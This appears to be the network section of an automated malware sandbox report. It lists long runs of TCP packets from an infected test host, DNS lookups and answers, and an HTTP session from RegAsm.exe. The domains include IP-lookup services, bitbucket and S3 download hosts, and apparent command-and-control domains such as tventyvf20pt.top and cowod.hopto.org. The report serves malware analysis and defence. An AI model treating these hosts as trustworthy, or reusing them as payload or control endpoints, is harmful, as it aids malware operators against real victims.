                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734673977 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734723091 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734750986 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734783888 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734807968 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734816074 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734821081 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734848976 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734860897 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.734891891 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.735583067 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.735635042 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.735646009 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.735832930 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.735866070 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.735898972 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.735914946 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.735915899 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.735949039 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.735982895 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.735996008 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736017942 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736023903 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736051083 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736063004 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736083984 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736090899 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736115932 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736126900 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736149073 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736155033 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736181974 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736190081 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736221075 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736234903 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736268997 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736279964 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736303091 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736310959 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736339092 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736342907 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736385107 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736464024 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736496925 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736516953 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736527920 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736541033 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736563921 CEST8049708147.45.44.104192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736566067 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.736603022 CEST4970880192.168.2.9147.45.44.104
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737335920 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737370014 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737405062 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737411022 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737411022 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737571955 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737618923 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737618923 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737623930 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737658024 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737690926 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737694025 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737694025 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737725973 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737772942 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737772942 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737778902 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737812996 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737864017 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737896919 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737911940 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737911940 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737947941 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737989902 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.737989902 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738034964 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738069057 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738101006 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738114119 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738114119 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738135099 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738168001 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738173962 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738173962 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738203049 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738235950 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738260984 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738260984 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738270998 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738305092 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738306999 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738306999 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738337994 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738369942 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738375902 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738375902 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738403082 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738452911 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738452911 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738461018 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738511086 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738543987 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738576889 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738584995 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738584995 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738610029 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738641977 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738675117 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738679886 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738679886 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738708973 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738746881 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.738746881 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.740498066 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.740531921 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.740565062 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.740571022 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.740571022 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.740597963 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.740688086 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.740878105 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.740911961 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.740962029 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.740993023 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741027117 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741034031 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741034031 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741470098 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741612911 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741663933 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741697073 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741702080 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741702080 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741729975 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741761923 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741769075 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741769075 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741792917 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741827011 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741837025 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741837025 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741964102 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.741997957 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742010117 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742010117 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742032051 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742063046 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742083073 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742095947 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742127895 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742141008 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742141008 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742160082 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742192030 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742198944 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742198944 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742228031 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742502928 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742611885 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742645979 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742680073 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742702007 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742702007 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742712975 CEST8049710103.130.147.211192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742750883 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.742750883 CEST4971080192.168.2.9103.130.147.211
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743004084 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743036985 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743069887 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743082047 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743082047 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743102074 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743134022 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743166924 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743175030 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743175030 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743200064 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743233919 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743237019 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743237019 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743266106 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743282080 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743298054 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743330956 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743336916 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743336916 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743379116 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743407011 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743443966 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743477106 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743513107 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743547916 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743547916 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743829012 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743861914 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743906975 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743906975 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743912935 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743944883 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743977070 CEST8049712176.113.115.33192.168.2.9
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743983984 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.743983984 CEST4971280192.168.2.9176.113.115.33
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.744009018 CEST8049712176.113.115.33192.168.2.9

                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Sep 21, 2024 13:33:33.791254044 CEST192.168.2.91.1.1.10xe827Standard query (0)api64.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:34.737132072 CEST192.168.2.91.1.1.10x41bcStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.180510998 CEST192.168.2.91.1.1.10x63a9Standard query (0)nerv.com.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.185277939 CEST192.168.2.91.1.1.10x70dStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.666882992 CEST192.168.2.91.1.1.10x22dbStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:34:03.884085894 CEST192.168.2.91.1.1.10x19f6Standard query (0)iplogger.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:34:12.479007959 CEST192.168.2.91.1.1.10xb4d5Standard query (0)tventyvf20pt.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:34:40.923058033 CEST192.168.2.91.1.1.10x881Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:35:39.856358051 CEST192.168.2.91.1.1.10xa1c2Standard query (0)questionmwq.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:35:40.076817989 CEST192.168.2.91.1.1.10xc45fStandard query (0)cowod.hopto.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:35:43.851875067 CEST192.168.2.91.1.1.10x3324Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Sep 21, 2024 13:33:33.798542976 CEST1.1.1.1192.168.2.90xe827No error (0)api64.ipify.org104.237.62.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:33.798542976 CEST1.1.1.1192.168.2.90xe827No error (0)api64.ipify.org173.231.16.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:34.744631052 CEST1.1.1.1192.168.2.90x41bcNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.188030958 CEST1.1.1.1192.168.2.90x63a9No error (0)nerv.com.pe162.241.61.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.192893982 CEST1.1.1.1192.168.2.90x70dNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.192893982 CEST1.1.1.1192.168.2.90x70dNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.192893982 CEST1.1.1.1192.168.2.90x70dNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.697937012 CEST1.1.1.1192.168.2.90x22dbNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.697937012 CEST1.1.1.1192.168.2.90x22dbNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.697937012 CEST1.1.1.1192.168.2.90x22dbNo error (0)s3-w.us-east-1.amazonaws.com52.217.131.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.697937012 CEST1.1.1.1192.168.2.90x22dbNo error (0)s3-w.us-east-1.amazonaws.com52.216.37.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.697937012 CEST1.1.1.1192.168.2.90x22dbNo error (0)s3-w.us-east-1.amazonaws.com54.231.192.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.697937012 CEST1.1.1.1192.168.2.90x22dbNo error (0)s3-w.us-east-1.amazonaws.com52.216.44.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.697937012 CEST1.1.1.1192.168.2.90x22dbNo error (0)s3-w.us-east-1.amazonaws.com3.5.28.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.697937012 CEST1.1.1.1192.168.2.90x22dbNo error (0)s3-w.us-east-1.amazonaws.com3.5.30.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.697937012 CEST1.1.1.1192.168.2.90x22dbNo error (0)s3-w.us-east-1.amazonaws.com52.216.214.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.697937012 CEST1.1.1.1192.168.2.90x22dbNo error (0)s3-w.us-east-1.amazonaws.com52.216.105.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:34:03.893021107 CEST1.1.1.1192.168.2.90x19f6No error (0)iplogger.org104.26.2.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:34:03.893021107 CEST1.1.1.1192.168.2.90x19f6No error (0)iplogger.org104.26.3.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:34:03.893021107 CEST1.1.1.1192.168.2.90x19f6No error (0)iplogger.org172.67.74.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:34:12.924277067 CEST1.1.1.1192.168.2.90xb4d5No error (0)tventyvf20pt.top5.53.124.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:34:40.930625916 CEST1.1.1.1192.168.2.90x881No error (0)steamcommunity.com23.197.127.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:35:20.266491890 CEST1.1.1.1192.168.2.90x1879Name error (3)sentistivowmi.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:35:39.870846987 CEST1.1.1.1192.168.2.90xa1c2No error (0)questionmwq.shop172.67.204.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:35:39.870846987 CEST1.1.1.1192.168.2.90xa1c2No error (0)questionmwq.shop104.21.85.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:35:40.085901976 CEST1.1.1.1192.168.2.90xc45fNo error (0)cowod.hopto.org45.132.206.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Sep 21, 2024 13:35:43.860799074 CEST1.1.1.1192.168.2.90x3324No error (0)steamcommunity.com23.192.247.89A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                0192.168.2.94970541.216.188.190806388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
